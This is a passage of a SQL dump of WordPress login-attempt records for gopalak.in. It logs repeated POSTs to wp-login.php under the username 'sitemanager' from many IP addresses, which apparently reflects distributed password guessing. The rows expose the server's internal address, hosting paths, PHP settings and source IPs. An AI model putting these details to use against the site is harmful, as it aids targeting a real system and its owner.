Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"49076\";s:11:\"REMOTE_ADDR\";s:11:\"162.0.235.8\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745496994.0235651;s:12:\"REQUEST_TIME\";i:1745496994;}}','162.0.235.8',0,'2025-04-24 17:46:37','1970-01-01 00:00:00'),(94116,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:117:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"34712\";s:11:\"REMOTE_ADDR\";s:13:\"91.121.44.198\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745497409.585634;s:12:\"REQUEST_TIME\";i:1745497409;}}','91.121.44.198',0,'2025-04-24 17:53:31','1970-01-01 00:00:00'),(94117,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"107\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58190\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.114.43\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745497806.8642581;s:12:\"REQUEST_TIME\";i:1745497806;}}','198.54.114.43',0,'2025-04-24 18:00:08','1970-01-01 00:00:00'),(94118,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:117:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"46406\";s:11:\"REMOTE_ADDR\";s:15:\"162.240.168.197\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745498216.175051;s:12:\"REQUEST_TIME\";i:1745498216;}}','162.240.168.197',0,'2025-04-24 18:06:58','1970-01-01 00:00:00'),(94119,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ro-RO,ro;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:84:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"38754\";s:11:\"REMOTE_ADDR\";s:12:\"52.45.232.96\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745498622.1016979;s:12:\"REQUEST_TIME\";i:1745498622;}}','52.45.232.96',0,'2025-04-24 18:13:43','1970-01-01 00:00:00'),(94120,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 Edg/114.0.1823.67\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"42118\";s:11:\"REMOTE_ADDR\";s:11:\"123.1.133.4\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745499026.0463991;s:12:\"REQUEST_TIME\";i:1745499026;}}','123.1.133.4',0,'2025-04-24 18:20:27','1970-01-01 00:00:00'),(94121,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"102\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"59678\";s:11:\"REMOTE_ADDR\";s:15:\"133.242.131.226\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745499433.5001111;s:12:\"REQUEST_TIME\";i:1745499433;}}','133.242.131.226',0,'2025-04-24 18:27:15','1970-01-01 00:00:00'),(94122,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ro-RO,ro;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54936\";s:11:\"REMOTE_ADDR\";s:13:\"51.178.81.248\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745499845.099977;s:12:\"REQUEST_TIME\";i:1745499845;}}','51.178.81.248',0,'2025-04-24 18:34:07','1970-01-01 00:00:00'),(94123,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"45028\";s:11:\"REMOTE_ADDR\";s:12:\"68.65.122.90\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745500262.140141;s:12:\"REQUEST_TIME\";i:1745500262;}}','68.65.122.90',0,'2025-04-24 18:41:04','1970-01-01 00:00:00'),(94124,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"48022\";s:11:\"REMOTE_ADDR\";s:12:\"68.65.122.90\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745500680.0578301;s:12:\"REQUEST_TIME\";i:1745500680;}}','68.65.122.90',0,'2025-04-24 18:48:01','1970-01-01 00:00:00'),(94125,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"37720\";s:11:\"REMOTE_ADDR\";s:14:\"185.104.44.163\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745501104.541646;s:12:\"REQUEST_TIME\";i:1745501104;}}','185.104.44.163',0,'2025-04-24 18:55:06','1970-01-01 